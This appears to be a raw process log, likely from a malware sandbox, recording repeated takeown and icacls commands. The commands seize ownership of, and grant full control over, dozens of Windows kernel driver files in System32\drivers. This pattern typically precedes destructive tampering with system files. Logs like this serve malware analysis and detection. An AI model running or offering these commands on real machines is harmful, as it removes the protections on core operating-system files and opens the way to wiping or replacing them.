"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\HdAudio.sys && icacls C:\Windows\System32\drivers\HdAudio.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\GAGP30KX.SYS /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\fvevol.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\gm.dls
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidbatt.sys && icacls C:\Windows\System32\drivers\hidbatt.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\gm.dls /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\gmreadme.txt /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\hcw85cir.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\hdaudbus.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\hcw85cir.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\hdaudbus.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidbth.sys && icacls C:\Windows\System32\drivers\hidbth.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\HdAudio.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidclass.sys && icacls C:\Windows\System32\drivers\hidclass.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\hidbatt.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidir.sys && icacls C:\Windows\System32\drivers\hidir.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\hidbatt.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\HdAudio.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\hidbth.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidparse.sys && icacls C:\Windows\System32\drivers\hidparse.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\hidclass.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\hidbth.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidusb.sys && icacls C:\Windows\System32\drivers\hidusb.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\hidclass.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\HpSAMD.sys && icacls C:\Windows\System32\drivers\HpSAMD.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\hidir.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\hidparse.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\http.sys && icacls C:\Windows\System32\drivers\http.sys /grant "%username%:F" && exit
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-2009073917732663071670004183-1855518428-836762450-1435725251-854236903-1722664778"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\hidusb.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hwpolicy.sys && icacls C:\Windows\System32\drivers\hwpolicy.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\hidir.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\hidparse.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\HpSAMD.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\hidusb.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\i8042prt.sys && icacls C:\Windows\System32\drivers\i8042prt.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\HpSAMD.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\http.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\iaStorV.sys && icacls C:\Windows\System32\drivers\iaStorV.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\hwpolicy.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\iirsp.sys && icacls C:\Windows\System32\drivers\iirsp.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\http.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\hwpolicy.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\i8042prt.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\iaStorV.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\intelide.sys && icacls C:\Windows\System32\drivers\intelide.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\intelppm.sys && icacls C:\Windows\System32\drivers\intelppm.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ipfltdrv.sys && icacls C:\Windows\System32\drivers\ipfltdrv.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\i8042prt.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\iaStorV.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\iirsp.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\iirsp.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\IPMIDrv.sys && icacls C:\Windows\System32\drivers\IPMIDrv.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ipnat.sys && icacls C:\Windows\System32\drivers\ipnat.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\intelppm.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\intelide.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\irda.sys && icacls C:\Windows\System32\drivers\irda.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\intelide.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\intelppm.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\irenum.sys && icacls C:\Windows\System32\drivers\irenum.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\IPMIDrv.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\ipfltdrv.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\isapnp.sys && icacls C:\Windows\System32\drivers\isapnp.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\ipnat.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\IPMIDrv.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\irda.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\kbdclass.sys && icacls C:\Windows\System32\drivers\kbdclass.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\ipfltdrv.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\irenum.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\kbdhid.sys && icacls C:\Windows\System32\drivers\kbdhid.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\ipnat.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\irda.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ks.sys && icacls C:\Windows\System32\drivers\ks.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\irenum.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ksecdd.sys && icacls C:\Windows\System32\drivers\ksecdd.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\isapnp.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\kbdclass.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ksecpkg.sys && icacls C:\Windows\System32\drivers\ksecpkg.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\ks.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\kbdhid.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ksthunk.sys && icacls C:\Windows\System32\drivers\ksthunk.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\isapnp.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\kbdclass.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\ksecdd.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\kbdhid.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\ks.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\ksecpkg.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\ksecdd.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\lltdio.sys && icacls C:\Windows\System32\drivers\lltdio.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\lsi_fc.sys && icacls C:\Windows\System32\drivers\lsi_fc.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\ksecpkg.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\ksthunk.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\lsi_sas.sys && icacls C:\Windows\System32\drivers\lsi_sas.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\ksthunk.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\lsi_sas2.sys && icacls C:\Windows\System32\drivers\lsi_sas2.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\lsi_fc.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\lltdio.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\lsi_sas.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\lsi_scsi.sys && icacls C:\Windows\System32\drivers\lsi_scsi.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\lsi_sas2.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\lsi_fc.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\luafv.sys && icacls C:\Windows\System32\drivers\luafv.sys /grant "%username%:F" && exit
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "821171106-13132607852750238001029164962-19380523714014206011873636859-412662357"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\lltdio.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\lsi_sas2.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mcd.sys && icacls C:\Windows\System32\drivers\mcd.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\lsi_sas.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\lsi_scsi.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\megasas.sys && icacls C:\Windows\System32\drivers\megasas.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\MegaSR.sys && icacls C:\Windows\System32\drivers\MegaSR.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\luafv.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\modem.sys && icacls C:\Windows\System32\drivers\modem.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\lsi_scsi.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\mcd.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\monitor.sys && icacls C:\Windows\System32\drivers\monitor.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\luafv.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mouclass.sys && icacls C:\Windows\System32\drivers\mouclass.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\mcd.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mouhid.sys && icacls C:\Windows\System32\drivers\mouhid.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\megasas.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\MegaSR.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\modem.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\megasas.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mountmgr.sys && icacls C:\Windows\System32\drivers\mountmgr.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mpio.sys && icacls C:\Windows\System32\drivers\mpio.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\monitor.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\modem.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\MegaSR.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mpsdrv.sys && icacls C:\Windows\System32\drivers\mpsdrv.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mrxdav.sys && icacls C:\Windows\System32\drivers\mrxdav.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\mouclass.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mrxsmb.sys && icacls C:\Windows\System32\drivers\mrxsmb.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\monitor.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mrxsmb10.sys && icacls C:\Windows\System32\drivers\mrxsmb10.sys /grant "%username%:F" && exit
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1983115247-1434122079-614781042-7406681702089988482-331161857-333778550-918386086"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\mouhid.sys
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-2141853289-917733064-158127044-3866211610232782301006422223-242268813-1884497704"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "15541073201327003157-1033637160-1112205660520911141596239588-293012031503135362"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\mpio.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mrxsmb20.sys && icacls C:\Windows\System32\drivers\mrxsmb20.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\mouclass.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\mountmgr.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\mpio.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msahci.sys && icacls C:\Windows\System32\drivers\msahci.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\mouhid.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\mpsdrv.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\mrxsmb10.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\mrxdav.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\mountmgr.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\mrxsmb.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\mpsdrv.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msdsm.sys && icacls C:\Windows\System32\drivers\msdsm.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\mrxsmb20.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\mrxsmb10.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\mrxdav.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\mrxsmb.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msfs.sys && icacls C:\Windows\System32\drivers\msfs.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\mrxsmb20.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\msahci.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\MsftWdf_Kernel_01009_Inbox_Critical.Wdf && icacls C:\Windows\System32\drivers\MsftWdf_Kernel_01009_Inbox_Critical.Wdf /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\msdsm.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\msfs.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\msahci.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\msdsm.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mshidkmdf.sys && icacls C:\Windows\System32\drivers\mshidkmdf.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\MsftWdf_Kernel_01009_Inbox_Critical.Wdf
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\msfs.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msisadrv.sys && icacls C:\Windows\System32\drivers\msisadrv.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msiscsi.sys && icacls C:\Windows\System32\drivers\msiscsi.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\MsftWdf_Kernel_01009_Inbox_Critical.Wdf /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mskssrv.sys && icacls C:\Windows\System32\drivers\mskssrv.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mspclock.sys && icacls C:\Windows\System32\drivers\mspclock.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mspqm.sys && icacls C:\Windows\System32\drivers\mspqm.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\mshidkmdf.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\msisadrv.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\msiscsi.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msrpc.sys && icacls C:\Windows\System32\drivers\msrpc.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\mshidkmdf.sys /grant "Admin:F"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "112174941115455205722096464011973091391775900097-931240359-2138449729131979299"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\msiscsi.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\mskssrv.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\msisadrv.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mssmbios.sys && icacls C:\Windows\System32\drivers\mssmbios.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mstee.sys && icacls C:\Windows\System32\drivers\mstee.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\mspqm.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\mspclock.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\mskssrv.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\MTConfig.sys && icacls C:\Windows\System32\drivers\MTConfig.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\mspqm.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\msrpc.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mup.sys && icacls C:\Windows\System32\drivers\mup.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\mspclock.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndis.sys && icacls C:\Windows\System32\drivers\ndis.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndiscap.sys && icacls C:\Windows\System32\drivers\ndiscap.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\msrpc.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\mssmbios.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\mstee.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndistapi.sys && icacls C:\Windows\System32\drivers\ndistapi.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\mup.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\mup.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\mstee.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\ndis.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\mssmbios.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\MTConfig.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\ndiscap.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndisuio.sys && icacls C:\Windows\System32\drivers\ndisuio.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\ndis.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\MTConfig.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\ndiscap.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\ndistapi.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndiswan.sys && icacls C:\Windows\System32\drivers\ndiswan.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndproxy.sys && icacls C:\Windows\System32\drivers\ndproxy.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\netbios.sys && icacls C:\Windows\System32\drivers\netbios.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\netbt.sys && icacls C:\Windows\System32\drivers\netbt.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\ndistapi.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\netio.sys && icacls C:\Windows\System32\drivers\netio.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nfrd960.sys && icacls C:\Windows\System32\drivers\nfrd960.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\ndisuio.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\ndiswan.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\ndproxy.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\netbios.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\npfs.sys && icacls C:\Windows\System32\drivers\npfs.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\netbt.sys
C:\Windows\system32\icacls.exe
